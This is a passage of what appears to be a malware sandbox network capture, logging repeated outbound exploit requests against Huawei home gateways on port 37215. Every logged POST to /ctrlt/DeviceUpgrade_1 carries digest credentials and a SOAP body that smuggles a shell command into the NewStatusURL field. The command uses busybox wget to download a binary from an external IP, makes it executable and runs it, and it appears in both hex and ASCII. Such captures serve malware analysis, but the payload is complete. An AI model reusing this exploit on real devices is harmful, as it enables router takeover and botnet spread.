                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              691192.168.2.1551396190.2.159.19637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.225364923 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              692192.168.2.1552212181.0.9.5637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.225390911 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              693192.168.2.154662241.171.227.4737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.225403070 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              694192.168.2.1544392197.137.225.17237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.225404978 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              695192.168.2.1558052121.222.135.3137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.225466013 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              696192.168.2.1548820186.81.87.6437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.225475073 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              697192.168.2.153388431.199.122.3937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.225501060 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              698192.168.2.1560030122.199.72.6937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.225528002 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              699192.168.2.153881841.21.129.037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.225538015 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              700192.168.2.153319241.35.212.9637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.225563049 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              701192.168.2.1557918122.8.253.4137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.225605965 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
